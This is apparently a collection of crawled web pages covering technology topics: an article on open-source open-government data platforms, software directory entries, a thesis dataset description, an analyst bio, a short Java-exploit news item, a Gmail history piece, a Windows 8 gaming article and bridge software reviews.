The U.S. National Action Plan on Open Government, which represents the U.S. commitment to the OGP, included some details about this initiative two months ago, building upon a State Department fact sheet that was released in July. Back in August, representatives from India’s National Informatics Center visited the United States for a week-long session of knowledge sharing with the U.S. Data.gov team, which is housed within the General Services Administration.
“The secretary of state and president have both spent time in India over the past 18 months,” said VanRoekel in an interview today. “There was a lot of dialogue about the power of open data to shine light upon what’s happening in the world.”
The project, which was described then as “Data.gov-in-a-box,” will include components of the Data.gov open data platform and the India.gov.in document portal. Now, the product is being called the “Open Government Platform” — not exactly creative, but quite descriptive and evocative of open government platforms that have been launched to date. The first collection of open source code, which describes a data management system, is now up on GitHub.
During the August meetings, “we agreed upon a set of things we would do around creating excellence around an open data platform,” said VanRoekel. “We owned the first deliverable: a dataset management tool. That’s the foundation of an open source data platform. It handles workflow, security and the check in of data — all of the work that goes around getting the state data needs to be in before it goes online. India owns the next phase: the presentation layer.”
If the initiative bears fruit in 2012, as planned, the international open government data movement will have a new tool to apply toward open data platforms. That could be particularly relevant to countries in the developing world, given the limited resources available to many governments. What’s next for open government data in the United States has yet to be written. “The evolution of data.gov should be one that does things to connect to web services or an API key manager,” said VanRoekel. “We need to track usage. We’re going to double down on the things that are proving useful.” Drupal as an open government platform?
This Open Government Data platform looks set to be built upon Drupal 6, a choice that would further solidify the inroads that the open source content management system has made into government IT. As always, code and architecture choices will have consequences down the road.
“While I’m not sure Drupal is a good choice anymore for building data sites, it is key that open source is being used to disseminate open data,” said Eric Gunderson, the founder of open source software firm Development Seed. “Using open source means we can all take ownership of the code and tune it to meet our exact needs. Even bad releases give us code to learn from.” Jeff Miccolis, a senior developer at Development Seed, concurred about how open the collaboration around the Data.gov code has been or will be going forward. “Releasing an application like this as open source on an open collaboration platform like Github is a great step,” he said. “It still remains to be seen what the ongoing commitment to the project will be, and how collaboration will work. There is no history in the git repository they have on GitHub, no issues in the issue tracker, nor even an explicit license in the repository. These factors don’t communicate anything about their future commitment to maintaining this newly minted open source project.”
The White House is hoping to hear from more developers like Miccolis. “We’re looking forward to getting feedback and improvements from the open source community,” said VanRoekel. “How do we evolve the U.S. data.gov as it sits today?”
Strata 2012 — The 2012 Strata Conference, being held Feb. 28-March 1 in Santa Clara, Calif., will offer three full days of hands-on data training and information-rich sessions. Strata brings together the people, tools, and technologies you need to make data work.
Save 20% on registration with the code RADAR20
Open data impact
From where VanRoekel sits, investing in open source, open government and open data remain important to the administration. He said to me that the fact that he was hired was a “clear indication of the importance” of these issues in the White House. “It wasn’t a coincidence that the launch of the Open Government Partnership coincided with my arrival,” he said. “There’s a lot of effort to meet the challenge of open government,” according to VanRoekel. “The president has me and other people involved meeting every week, reporting on progress.”
The open questions now, so to speak, are: Will other countries use it? And to what effect? Here in the U.S., there’s already code sharing between cities. OpenChattanooga, an open data catalog in Tennessee, is using source code from OpenDataPhilly, an open government data platform built in Philadelphia by GIS software company Azavea. By the time “Data.gov in a box” is ready to be deployed, some cities, states and countries might have decided to use that code in the meantime.
There’s good reason to be careful about celebrating the progress here. Open government analysts like Nathaniel Heller have raised concerns about the role of open data in the Open Government Partnership, specifically that:
… open data provides an easy way out for some governments to avoid the much harder, and likely more transformative, open government reforms that should probably be higher up on their lists. Instead of fetishizing open data portals for the sake of having open data portals, I’d rather see governments incorporating open data as a way to address more fundamental structural challenges around extractives (through maps and budget data), the political process (through real-time disclosure of campaign contributions), or budget priorities (through online publication of budget line-items).
Similarly, Greg Michener has made a case for getting the legal and regulatory “plumbing” for open government right in Brazil, not “boutique Gov 2.0” projects that graft technology onto flawed governance systems. Michener warned that emulating the government 2.0 initiatives of advanced countries, including open data initiatives:
… may be a premature strategy for emerging democracies. While advanced democracies are mostly tweaking and improving upon value-systems and infrastructure already in place, most countries within the OGP have only begun the adoption process.
Michener and Heller both raise bedrock issues for open government in Brazil and beyond that no technology solution in of itself will address. They’re both right: Simply opening up data is not a replacement for a Constitution that enforces a rule of law, free and fair elections, an effective judiciary, decent schools, basic regulatory bodies or civil society, particularly if the data does not relate to meaningful aspects of society. “Right now, the problem we are seeing is not so much the technology around how to open data but more around the culture internally of why people are opening data,” agreed Gunderson. “We are just seeing a lot of bad data in-house and thus people wanting to stay closed. At some point a lot of organizations and government agencies need to come clean and say ‘we have not been managing our decisions with good data for a long time’. We need more real projects to help make the OGP more concrete.”
Heller and Michener speak for an important part of the open government community and surely articulate concerns that exist for many people, particularly for a “good government” constituency whose long term, quiet work on government transparency and accountability may not be receiving the same attention as shinier technology initiatives. The White House consultation on open government that I attended included considerable recognition of the complexities here.
It’s worth noting that Heller called the products of open data initiatives “websites,” including Kenya’s new open government platform. He’s not alone in doing so. To rehash an old but important principle, Gov 2.0 is not about “websites” or “portals” — it’s about web services and the emerging global ecosystem of big data. In this context, Gov 2.0 isn’t simply about setting up social media accounts, moving to grid computing or adopting open standards: it’s about systems thinking, where open data is used both by, for and with the people. If you look at what the Department of Health and Human Services is trying to do to revolutionize healthcare with open government data in the United States, that approach may become a bit clearer. For that to happen, countries, states and cities have to stand up open government data platforms. The examples of open government data being put to use that excite VanRoekel are, perhaps unsurprisingly, on the healthcare front. If you look at the healthcare community pages on Data.gov, “you see great examples of companies and providers meeting,” he said, referencing two startups from a healthcare challenge that were acquired by larger providers as a result of their involvement in the open data event.
I’m cautiously optimistic about what this news means for the world, particularly for the further validation of open source in open government. With this step forward, the prospects for stimulating more economic activity, civic utility and accountability under a global open government partnership are now brighter.
Historic global Open Government Partnership launches in New York City
Government IT’s quiet open source evolution
International Open Government Data Camp looks to build community
tags: Gov 2.0, government as a platform, open data, open government, open source, stratablog
Get the O’Reilly Data Newsletter
Stay informed. Receive weekly insight from industry insiders.
Dave Bucci
To be truly open, it’s important for the whole stack to be open source. For instance, other government efforts have open-sourced portal software, but which relies on proprietary GIS software under the covers (notably ESRI). While that’s a perfectly valid architectural choice for a system, it limits the ability of groups to replicate and innovate using the software, because of the cost factors that are a barrier to entry.
By simply building upon a truly open source stack (e.g., OS Geo), any group, large or small, can openly innovate upon the offering.
Ilkka Rinne
When taking about open data or open access web services, even more important that the software stack being Open Source is that the interfaces are based on open standards. In the case of GIS those standards are developed by the Open Geospatial Consortium, W3C, OASIS etc.
There should be no problem communicating between web services provided by ESRI and the ones by OS Geo if they both follow the same OGC standards.
Get the Data Newsletter Stay informed. Receive weekly insight from industry insiders.
Recent Posts Four short links: 30 November 2015
Four short links: 27 November 2015
Kristian Hammond on truly democratizing data and the value of AI in the enterprise | 计算机 |
2015-48/3677/en_head.json.gz/13945 | Apache is the world's most popular HTTP server,
being quite possibly the best around in terms of
functionality, efficiency, security and speed.
Linux is a clone of the Unix kernel, written from scratch by Linus Torvalds with assistance from a loosely-knit team of hackers across the Net. It aims towards POSIX and Single UNIX Specification compliance. It has all the features you would expect in a modern fully-fledged Unix kernel, including true multitasking, virtual memory, shared libraries, demand loading, shared copy-on-write executables, proper memory management, and TCP/IP networking. GPL · Linux · Operating System Kernels · Operating Systems
PostgreSQL is a robust relational database system with over 25 years of active development that runs on all major operating systems. It is fully ACID compliant, and has full support for foreign keys, joins, views, triggers, and stored procedures (in multiple languages). It includes most SQL92 and SQL99 data types, including INTEGER, NUMERIC, BOOLEAN, CHAR, VARCHAR, DATE, INTERVAL, and TIMESTAMP. It also supports storage of binary large objects, including pictures, sounds, or video. It has native programming interfaces for C/C++, Java, .Net, Perl, Python, Ruby, Tcl, and ODBC, among others, and exceptional documentation.
PostgreSQL License · Database · Database Engines/Servers
KDE Software Compilation
For users on Linux and Unix, KDE offers a full suite of user workspace applications which allow interaction with these operating systems in a modern, graphical user interface. This includes Plasma Desktop, KDE's innovative and powerful desktop interface. Other workspace applications are included to aid with system configuration, running programs, or interacting with hardware devices. While the fully integrated KDE Workspaces are only available on Linux and Unix, some of these features are available on other platforms. In addition to the workspace, KDE produces a number of key applications such as the Konqueror Web browser, Dolphin file manager, and Kontact, the comprehensive personal information management suite. The list of applications includes many others, including those for education, multimedia, office productivity, networking, games, and much more. Most applications are available on all platforms supported by the KDE Development. KDE also brings to the forefront many innovations for application developers. An entire infrastructure has been designed and implemented to help programmers create robust and comprehensive applications in the most efficient manner, eliminating the complexity and tediousness of creating highly functional applications.
GPL · Software Development · Internet · Multimedia · Utilities
MySQL is a widely used and fast SQL database server. It is a client/server implementation that consists of a server daemon (mysqld) and many different client programs/libraries. GPL · Database · Database Engines/Servers
fio is an I/O tool meant to be used both for benchmark and stress/hardware verification. It has support for 19 different types of I/O engines (sync, mmap, libaio, posixaio, SG v3, splice, null, network, syslet, guasi, solarisaio, and more), I/O priorities (for newer Linux kernels), rate I/O, forked or threaded jobs, and much more. It can work on block devices as well as files. fio accepts job descriptions in a simple-to-understand text format. Several example job files are included. fio displays all sorts of I/O performance information, including complete IO latencies and percentiles. Fio is in wide use in many places, for both benchmarking, QA, and verification purposes. It supports Linux, FreeBSD, NetBSD, OpenBSD, OS X, OpenSolaris, AIX, HP-UX, Android, and Windows.
GPLv2 · Filesystems · Benchmark
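For a flavor of fio's job-description format, here is a minimal illustrative job file (the option names are standard fio options; the values are arbitrary):

    ; random-read benchmark sketch -- run with: fio randread.fio
    [global]
    ioengine=libaio
    direct=1
    runtime=30
    time_based

    [randread-test]
    rw=randread
    bs=4k
    size=1g
    numjobs=4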
The SeaMonkey project is a community effort to develop an all-in-one Internet application suite. It contains an Internet browser, email and newsgroup client with an included Web feed reader, HTML editor, IRC chat, and Web development tools, and is sure to appeal to advanced users, Web developers, and corporate users. It uses much of the Mozilla source code powering such successful siblings as Firefox, Thunderbird, Camino, Sunbird, and Miro.
cygbuild
A porting tool for making Cygwin net releases.
pmcyg
A tool for creating customized Cygwin installers.
release date:May 2006
Continuing with the tradition of offering the best and most comprehensive coverage of Red Hat Linux on the market, Red Hat Fedora 5 Unleashed includes new and additional material based on the latest release of Red Hat's Fedora Core Linux distribution. Incorporating an advanced approach to presenting information about Fedora, the book aims to provide the best and latest information that intermediate to advanced Linux users need to know about installation, configuration, system administration, server operations, and security.
Red Hat Fedora 5 Unleashed thoroughly covers all of Fedora's software packages, including up-to-date material on new applications, Web development, peripherals, and programming languages. It also includes updated discussion of the architecture of the Linux kernel 2.6, USB, KDE, GNOME, Broadband access issues, routing, gateways, firewalls, disk tuning, GCC, Perl, Python, printing services (CUPS), and security. Red Hat Linux Fedora 5 Unleashed is the most trusted and comprehensive guide to the latest version of Fedora Linux.
Paul Hudson is a recognized expert in open source technologies. He is a professional developer and full-time journalist for Future Publishing. His articles have appeared in Internet Works, Mac Format, PC Answers, PC Format and Linux Format, one of the most prestigious linux magazines. Paul is very passionate about the free software movement, and uses Linux exclusively at work and at home. Paul's book, Practical PHP Programming, is an industry-standard in the PHP community. manufacturer website | 计算机 |
2015-48/3678/en_head.json.gz/535 | Data files used to study the distribution of growth in software systems
Download Description accompanying growth dynamics data files (PDF) (Adobe Acrobat PDF, 96 KB)
Vasa, Rajesh
The evolution of a software system can be studied in terms of how various properties as reflected by software metrics change over time. Current models of software evolution have allowed for inferences to be drawn about certain attributes of the software system, for instance, regarding the architecture, complexity and its impact on the development effort. However, an inherent limitation of these models is that they do not provide any direct insight into where growth takes place. In particular, we cannot assess the impact of evolution on the underlying distribution of size and complexity among the various classes. Such an analysis is needed in order to answer questions such as 'do developers tend to evenly distribute complexity as systems get bigger?', and 'do large and complex classes get bigger over time?'. These are questions of more than passing interest since by understanding what typical and successful software evolution looks like, we can identify anomalous situations and take action earlier than might otherwise be possible. Information gained from an analysis of the distribution of growth will also show if there are consistent boundaries within which a software design structure exists. The specific research questions that we address in Chapter 5 (Growth Dynamics) of the thesis this data accompanies are: What is the nature of distribution of software size and complexity measures? How does the profile and shape of this distribution change as software systems evolve? Is the rate and nature of change erratic? Do large and complex classes become bigger and more complex as software systems evolve? In our study of metric distributions, we focused on 10 different measures that span a range of size and complexity measures. In order to assess assigned responsibilities we use the two metrics Load Instruction Count and Store Instruction Count. Both metrics provide a measure for the frequency of state changes in data containers within a system. Number of Branches, on the other hand, records all branch instructions and is used to measure the structural complexity at class level. This measure is equivalent to Weighted Method Count (WMC) as proposed by Chidamber and Kemerer (1994) if a weight of 1 is applied for all methods and the complexity measure used is cyclomatic complexity. We use the measures of Fan-Out Count and Type Construction Count to obtain insight into the dynamics of the software systems. The former offers a means to document the degree of delegation, whereas the latter can be used to count the frequency of object instantiations. The remaining metrics provide structural size and complexity measures. In-Degree Count and Out-Degree Count reveal the coupling of classes within a system. These measures are extracted from the type dependency graph that we construct for each analyzed system. The vertices in this graph are classes, whereas the edges are directed links between classes. We associate popularity (i.e., the number of incoming links) with In-Degree Count and usage or delegation (i.e., the number of outgoing links) with Out-Degree Count. Number of Methods, Public Method Count, and Number of Attributes define typical object-oriented size measures and provide insights into the extent of data and functionality encapsulation. The raw metric data (4 .txt files and 1 .log file in a .zip file measuring ~0.5MB in total) is provided as a comma separated values (CSV) file, and the first line of the CSV file contains the header. 
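For example, the CSV data could be loaded with standard tools (the file name inside the archive is an assumption for illustration):

    import pandas as pd

    # The description states the first line of the CSV is the header.
    df = pd.read_csv("growth_metrics.csv")
    print(df.describe())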
A detailed output of the statistical analysis undertaken is provided as log files generated directly from Stata (statistical analysis software).
Research dataset
Originally presented as an appendix to: Vasa, R. (2010). Growth and change dynamics in open source software systems. PhD thesis, Swinburne University of Technology.
Appendix E: Growth Dynamics Data Files, p. 204
080306 Open Software; 080309 Software Engineering; 8902 Computer Software and Services
Metrics; Open source software; PhD theses completed in 2010; Software evolution; Software engineering; Software maintenance
Faculty of Information and Communication Technologies, Swinburne University of Technology
Australasian Digital Theses collection
Copyright © 2010 Rajesh Vasa. The files are made available here with the kind permission of the creator under the terms of a Creative Commons Attribution 3.0 Unported (CC BY 3.0) licence (http://creativecommons.org/licenses/by/3.0/). The full thesis is available from: http://hdl.handle.net/1959.3/95058.
Thesis Supervisor: Jean-Guy Schneider
Thesis Note: This research dataset accompanies a thesis submitted for the degree of Doctor of Philosophy, Swinburne University of Technology, 2010.
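Though not part of the original record, the following minimal sketch illustrates the kind of distribution analysis the description above refers to, for example asking whether complexity is spread evenly across classes within a release. It is a sketch only: the file name ("metrics.txt") and the column names ("release", "branch_count") are illustrative assumptions, not the actual header labels, which are documented in the accompanying description PDF.

import csv
from collections import defaultdict

def gini(values):
    # Gini coefficient over a list of non-negative numbers:
    # 0.0 means the metric is spread evenly across classes,
    # values near 1.0 mean it is concentrated in a few classes.
    xs = sorted(values)
    n, total = len(xs), sum(xs)
    if n == 0 or total == 0:
        return 0.0
    weighted = sum(i * x for i, x in enumerate(xs, start=1))
    return (2.0 * weighted) / (n * total) - (n + 1.0) / n

by_release = defaultdict(list)
with open("metrics.txt") as f:  # assumed file name
    for row in csv.DictReader(f):
        # assumed columns: a release identifier and per-class Number of Branches
        by_release[row["release"]].append(int(row["branch_count"]))

for release, branches in sorted(by_release.items()):
    print(release, len(branches), "classes, Gini =", round(gini(branches), 3))

Under these assumptions, a Gini value that stays roughly constant across releases would suggest developers keep distributing complexity in the same proportions as a system grows, while a rising value would indicate that large, complex classes are absorbing a growing share of it.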
Ted serves Application Development & Delivery Professionals. He has 27 years of experience in the technology industry, focusing on the effects of disruptive technologies on people and on businesses. His current research agenda analyzes the expanding role of content and content delivery in a mobile-first, digital-always world, including the effects on web content management and digital experience delivery platforms.
Ted is the coauthor of The Mobile Mind Shift: Engineer Your Business to Win in the Mobile Moment (Groundswell Press, June 2014). Your customers now turn to their smartphones for everything. What's tomorrow's weather? Is the flight on time? Where's the nearest store, and is this product cheaper there? Whatever the question, the answer is on the phone. This Pavlovian response is the mobile mind shift — the expectation that I can get what I want, anytime, in my immediate context. Your new battleground for customers is this mobile moment — the instant in which your customer is seeking an answer. If you're there for them, they'll love you; if you're not, you'll lose their business. Both entrepreneurial companies like Dropbox and huge corporations like Nestlé are winning in that mobile moment. Are you?
Ted is also the coauthor of Empowered: Unleash Your Employees, Energize Your Customers, and Transform Your Business (Harvard Business Review Press, September 2010). Social, mobile, video, and cloud Internet services give consumers and business customers more information power than ever before. To win customer trust, companies must empower their employees to directly engage with customers using these same technologies.Previous Work ExperiencePreviously, Ted analyzed the consumerization of IT and its impact on a mobile-first workforce, the future of file services in a mobile-first, cloud-enabled world, mobile collaboration tools, workforce technology adoption and use, and the rise of cognitive computing. In 2009, Ted launched Forrester's Workforce Technology Assessment, the industry's first benchmark survey of workforce technology adoption. This quantitative approach helps professionals and the teams they work with have a fact-based conversation about employees' technology adoption.
Prior to joining Forrester in April 1997, Ted was a cofounder of Phios, an MIT spinoff. Before that, Ted worked for eight years as CTO and director of engineering for a software company serving the healthcare industry. Early in his career, Ted was a singer and bass player for Crash Davenport, a successful Maryland-based rock-and-roll band.EducationTed has a master's degree in management from the MIT Sloan School of Management. He also holds an M.S. in computer science from the University of Maryland and a B.A. with honors in physics from Swarthmore College.(Read Full Bio)(Less)275Research CoverageAdobe Systems, Apple, Cisco Systems, Citrix Systems, Collaboration Platforms, Dell, Enterprise Collaboration, Google, Hewlett-Packard (HP), IBM | 计算机 |
EuroFight - January 11, 2013 04:29PM in Bugs / Virus
A malware exploit has been reported named Mal/JavaJar-B. The malware exploits a vulnerability in Java 7 that is already being used against systems and distributed among hackers, but has not yet been patched. The malware allows hackers to run code remotely on infected machines running Windows, Linux, and Unix, although Mac OS X remains safe as of now. The U.S. Department of Defense has advised users to disable Java on any systems running the software.
Users with the software installed can easily disable the software from running in the browser through unchecking 'Enable Java content in the browser' under 'Security' in the Java Control Panel. Java has recently played victim to a number of exploits that have used its broad implementation for more sinister purposes. Despite this, Java also provides a great platform for small developers to deploy their software, and has played host to many well-known titles such as Minecraft. | 计算机 |
Paul Buchheit, the Man Behind Gmail
(Photo: Creative Commons-licensed by jm3)
"I think, in general, people are uncomfortable with things that are different. Even now when I talk about adding new features to Gmail, if it isn't just a small variation or rearranging what's already there, people don't like it. People have a narrow concept of what's possible, and we're limited more by our own ideas about what's possible than what really is possible. So they just get uncomfortable, and they kind of tend to attack it for whatever reason." (Paul Buchheit, the creator of Gmail)
Paul Buchheit is the man behind Gmail, the first and the most successful AJAX web application from Google.
On April 1, 2004, we rolled out the first release of Gmail. It immediately became known for giving away 1000 MB of storage, while the others only offered 4 MB, as they had for many years. We didn't do that just for the attention (although we certainly got our share). It's just part of our philosophy. We always want to do as much as we can for our users, and so if we can make something free, we will.
But storage was only the most obvious difference, and our other improvements were just as important. Gmail included a quick and accurate search. It introduced powerful new concepts to organize email, such as the conversation view (so now I can finally see all those replies at once). It provided a fast and dynamic interface from web browsers everywhere, popularizing the techniques that have since become known as AJAX.
This interface included many important features not commonly found on the web at that time, such as email address auto-completion, a slick spell-checker, keyboard shortcuts, and pages that update instantly. It included a smart spam filter to get rid of junk mail. Finally, we made an important new promise: you can keep your Gmail address and all of your email, even if you someday decide that Gmail is not for you. Cell phone owners already have the right to keep their old phone number when switching to a new provider, and you should have that same freedom with email. To ensure this freedom, Gmail provides, for free, both email forwarding and POP download of all your mail. Many services are now beginning to include other Gmail innovations; we hope that some day they will also be willing to include this one.
Gmail also managed to make other competing email services improve.
Mr. Buchheit said he started working on Gmail after observing that other email programs were getting worse, not better. Microsoft's Mr. Doerr said that at his company, Gmail was a thunderbolt. "You guys woke us up," he told Mr. Buchheit. Yahoo's Mr. Diamond, then at a startup with its own hot, new email program [OddPost, now known as Yahoo Mail Beta], said Gmail was the final impetus that Yahoo needed to buy his company. Mr. Buchheit responded with a victory lap. "We were trying to make the email experience better for our users," he said. "We ended up making it better for yours, too."
"Paul was one of the first engineers at Google. Among other things, he came up with the idea for PigeonRank. Oh yeah, and Gmail, which he largely built himself in the middle of the night. Paul liked to get to the office after noon or even at dinnertime, then work on into the next morning," recalls an ex-Googler. He also wrote the original prototype of Google AdSense and came up with Google's mantra: "Don't be evil". He joined Google in 1999, but he left the company last year because his life there became "too predictable, and too typical." But you can find him at his blog, where he still talks a lot about Google.
Blizzard agrees with Valve: Windows 8 is bad for video game makers
The world’s biggest PC video game makers aren’t very happy about Microsoft’s new operating system, Windows 8. Speaking with one-time Microsoft Game Studios chief, Ed Fries, at a Casual Connect earlier this week, Valve’s Gabe Newell described Microsoft’s plans as a “catastrophe.”
“Windows 8 is kind of a catastrophe for everybody in the PC space,” said Newell, “I think that we’re going to lose some of the top-tier PC [original equipment manufacturers]. They’ll exit the market. I think margins are going to be destroyed for a bunch of people. If that’s true, it’s going to be a good idea to have alternative to hedge against that eventuality.”
Newell says this is why Valve is pushing hard to bring its games, its Source engine, and the Steam digital distribution platform to the Linux operating system.
Is he alone in thinking that Windows 8 will be a disaster for the PC gaming industry? Blizzard's Rob Pardo doesn't think so. The StarCraft designer, now vice president of game design at Blizzard, the studio behind Diablo III, said that he believes Microsoft's new operating system will also be a thorn in his company's side.
Pardo Tweeted on Wednesday, “Nice interview with Gabe Newell—‘I think Windows 8 is a catastrophe for everyone in the PC space’—not awesome for Blizzard either.”
The belief in the development community is that Microsoft will make Windows 8 a closed system - an operating system that more stringently controls software distribution, much in the way that Apple does with Mac OS X and the iOS platform. This would allow Microsoft to better monitor the quality of applications running on its platform, but it would also wall off the most widely used operating system in the world from myriad developers. PC game makers use Windows because of the openness of the platform and its ubiquity. If Microsoft takes that openness away, what will developers do?
Windows 8 won’t be released until October of this year, so Microsoft still has time to decide exactly how free game and application makers will be to use the system. Valve and Blizzard are, by sales and reputation, the biggest PC game makers in the world and their influence over Microsoft’s platform isn’t insignificant. If Blizzard and others follow Valve to Linux platforms, what will Microsoft do to lure them back? Will PC gaming become increasingly based on streaming and browser-based solutions? | 计算机 |
Bridge CD-ROMs & DVDs
This is a selection of some of the best bridge card game CD-ROMs around. Most are for sale over the internet at the Amazon.com store.
A limited number of these items, plus a number of additional ones not available from Amazon.com, are available from Amazon.co.uk. __________________________
"Play Modern bridge" with Andrew Robson covers eight aspects of bridge. Andrew covers all the basic areas of the game, each concluding with a concise "If you remember just three things", which can also be acessesd seperately. The aspects are:
Bidding as Opener
Bidding as Responder
Using Trumps
Opening One No trump and Responding
Card Play Techniques
Overcalling
Opening Leads and Defence
The key features of this unique product:
Over three hours of quality teaching
Live format - with four keen students learning at a table
Graphical representation of the hands for clarity
Easy to understand illustrative Flow Charts and Diagrams
Ideal for learning - with repeat viewing freeze-frame, and summaries
Click the links for previews of this DVD: clip1 and clip2 on YouTube.
Bridge is a popular game with a long history; it can be played at home, out with friends, or even online. Bridge Baron 22 (for Windows or Mac) is the newest version of the most popular bridge playing program, and a five-time world computer bridge champion. It offers over 40 play levels, optional double dummy card play and a choice of bidding systems - Standard American, 2/1, Acol, French 5-card major, Forum D, Precision or SAYC. The latest features of this new (October 18, 2011) version include:
New Bridge Tournaments for free, such as the 2011 Cavendish (with Butler cross-IMPs scoring) and the 2011 NSWBA ANC Butler Open Section (with Butler IMPs scoring).
24 new challenging problem deals, for a total of 326 Challenges. Kit Woolsey, multiple world champion and author of several bridge books, designed the new deals.
The ability to see what Bridge Baron is 'thinking' about at higher levels of bidding and play, and to force it to bid or play immediately by clicking the 'Bid Now' or 'Play Now' button.
The option to choose among hand evaluation methods, such as long-suit point count or short-suit point count.
On the Mac, a vastly improved user interface.
Improved bidding and play, including improved Two-over-One bidding, improved matchpoint-focused bidding and play when playing tournament deals at matchpoints, and more realistic double-dummy card play.
Bridge Baron offers you the most comprehensive, easy-to-use bridge game available. Bridge Baron 18 Express Edition has over 40 skill levels, plays 500 deals, over 95 optional bidding conventions and many other features. Compete in tournament deals. Hints are always available (including reasons why). Double dummy solver. Par contract analysis. Choose long-suit or short-suit point count. Conventional bids alerted or announced. With all these features, it's no wonder that Bridge Baron is five-time winner of the world computer bridge championships.
To accompany your Bridge Baron there are a number of Bridge Tournament CD-ROMs. With these CDs you can see your matchpoint scores, calculated using the actual North American championship results, and you can see how you would have placed in that session if you had partnered with Bridge Baron in the actual ACBL tournament. Tournament CDs currently available are:
#1: Chicago '98, Orlando '98, Vancouver '99, San Antonio '99
#7: Miami Beach '75, Winnipeg '85, Atlanta '95
#8: New Orleans '03, Reno '04, New York '04
#9: Orlando '04, Pittsburgh '05, Atlanta '05
#10: Cavendish '00 - '04
#11: Denver '05, Dallas '06, Chicago '06
#12: Hawaii '06, St. Louis '06, Nashville '07
#13: San Francisco '07, Detroit '08, Las Vegas '08
#14: Boston '08, Houston '09, Washington DC '09
In order to get the most out of your Bridge Baron, order the book Bridge Baron Companion - How to Get the Most Out of Your Computer Bridge Game, which is reviewed on bridge book reviews page 15. __________________________
Bridge Buff 19 and Bridge Deal 7 are two programs on one CD. Bridge Buff plays a great game of bridge and is highly praised throughout the Bridge Community. It is perfect for all levels of players, with tutorials for beginners and intermediates, and large numbers of conventions (codified deep into the auction), for more advanced players. Note that the Amazon box says Bridge Buff #17; it is actually #18. Visual Deal is a versatile deal generator with an integrated double dummy analyser. You can design hands in many ways such as hands suitable for a specific convention or hand pattern. Bridge Buff features excellent auction stability and uses Visual Deal to deal out thousands of randomly generated deals, complete with auctions. Each auction is then tested for reasonableness. There is a matchpoint-style bidding mode featuring aggressive bidding sequences around the table, similar to action found in your local duplicate club. There are two playing modes. In Practice mode, you have full control over every element of the game, and you can redeal, rebid, replay, take back cards, peek, and cheat as much as you want. In Match mode, you play a series of hands against a 'closed room' opponent and can play Teams, Pairs and Individual matches. Match mode also includes matchpoint estimates so you can measure how well you are doing against both strong and weak fields. The Bridge Buff display looks terrific and is exceptionally easy to use. It features one-button access to most functions, and includes balloon help comments over most buttons. Bridge Buff features a huge range of optional modern conventions.
Apart from all of the above, there is one very important feature for serious players that sets Bridge Buff apart from all of the other bridge playing programs. The program supports three basic bidding systems, Standard American, 2/1, and Kaplan-Sheinwold;
but it also includes a 'System Builder', which enables you to define a system or convention one bid at a time. For example, if you want to play Precision Club, you can specify that any hand with 16+ high card points be opened 1C, and that after the sequence "1C-P", partner should bid 1H with 5 Hearts and 8+ HCPs, and so on. This is the only Bridge playing program which offers this capability. Bridge Baron and GIB do not support Precision at all. Q-Plus does support Precision, but there is not one standard version of Precision, so it is unlikely that Q-Plus plays the specific variation that you play, and there is no way to modify it to make it do so, as you can with Bridge Buff. Also, when Bridge Buff makes a bidding error, you can go into System Builder and make an entry to correct it. Then when the same situation arises in the future, Bridge Buff will bid the way you want it to. Even if you never create a system of your own, it is worth learning to use System Builder to fix these kinds of errors.
Visual Deal is a hugely flexible Deal Generator that stands alone by virtue of its ease-of-use, its flexibility, and the fact it includes the generation of complete auctions and play-of-the-hand. Visual Deal uses Bridge Buff bidding and playing modules. You can watch deals one-by-one, or run a series of deals (10 to 1000) and accumulate statistics, or print a series of deals to a printer or file. The print formats are very flexible, including all needed for dealing machines.
Apart from Bridge Buff and Visual Deal, there are three other useful programs included on the CD-ROM. Bid Buddy. If you want a distraction from boring work, Bid Buddy is a fun utility that pops up on your desktop with an exciting hand to bid (you schedule how often).
Bid Sequencer. Want help writing system notes? Bid Sequencer generates bidding sequences (you decide which), up to 44,000 of them, in an Excel spreadsheet.
Convention Card Editor, which enables you to edit your ACBL format convention card. __________________________
Jack is the winner of seven World Computer Bridge Championships: 2001, 2002, 2003, 2004, 2006, 2009 and 2010. Jack 5.0 is the strongest bridge program available; with a new bidding and play engine, Jack is very user friendly and offers numerous exciting features and options:
Over 30 levels of play. Build your own convention card using over 65 conventions.
Or use one of the built-in convention cards, like Standard American or Two-over-One.
Convention cards for beginners are also available. Adjustable opening lead systems and defensive signal methods.
You may ask for hints during bidding or play.
Extensive built in help with many examples.
Play with up to four people in a network or over the internet.
You have complete control over the generated deals using the deal profiler.
Jack can analyse a position and show you what he thinks about it.
The fastest double dummy solver in the world will show you how many tricks can be made with each card.
Play duplicate, rubber or Chicago bridge.
Create your own tournaments or play in one of the many provided.
Determine the par score for any hand; Jack will tell you the optimal contracts for both sides.
Tip of the day, each time Jack is started.
Extensive printing capabilities. __________________________
GIB (Ginsberg's Intelligent Bridge) is the winner of two world bridge computer championships; this latest version is faster and stronger than previous versions. It offers a wide range of bidding systems including Standard American, two-over-one, Kaplan-Sheinwold, Goren and Acol. Other features include: Highest quality of play of any bridge program, commercial or otherwise. Easy-to-use graphical interface. Multilingual interface supporting Dutch, English, Finnish, French, German, Hungarian, Italian and Swedish. Get hints or watch GIB think. Compare your play with closed room experts: Replay 2500+ deals from international tournaments and compare your actions to those of the masters. Variety of defensive signalling options. Not only does GIB signal, it watches your signals and defends appropriately. The only computer program ever to have been a member of the ACBL or to have won master points in play against humans. ACBL and international-style convention cards. Wide range of bidding systems, including Standard American, two-over-one Game Forcing, Kaplan-Sheinwold, ACOL, and traditional Goren; and also many individual conventions. High-visibility card option for use on small or hard-to-read screens. Sophisticated artificial intelligence search algorithms use Monte Carlo techniques for card play and Borel simulations for bidding.
A few testimonials about GIB:
"Sensational breakthrough in bridge software" (Onno Eskes, editor of the Dutch Bridge Magazine IMP)
"Revolutionary; certainly much better than any other program I have ever seen ... entirely in a class by itself" (Fred Gitelman, Canadian international) -
"Tremble for the human race" (Zia Mahmood, world champion)
"Impressed by the quality of its card play" (Jeff Meckstroth, world champion) -
"Ginsberg has shown that his program plays the cards much much better than any program on the market" (Jim Loy's software review) __________________________
The main meat of this program is playing bridge against the computer, although there is also a multiplayer option. You can use three bidding systems with Omar Sharif Bridge - Acol, 5 Card Majors and Standard American - and hands can be set up randomly, or you can bias the deal so you're more likely to get a good hand.
There is also a tutorial mode consisting of text-only comments on a selection of a hundred hands, complete with bidding and ideal play instructions, rather like the ones you get in the papers. These are quite useful in that each illustrates a salient bridge tactic. It's not really for beginners - only intermediate.
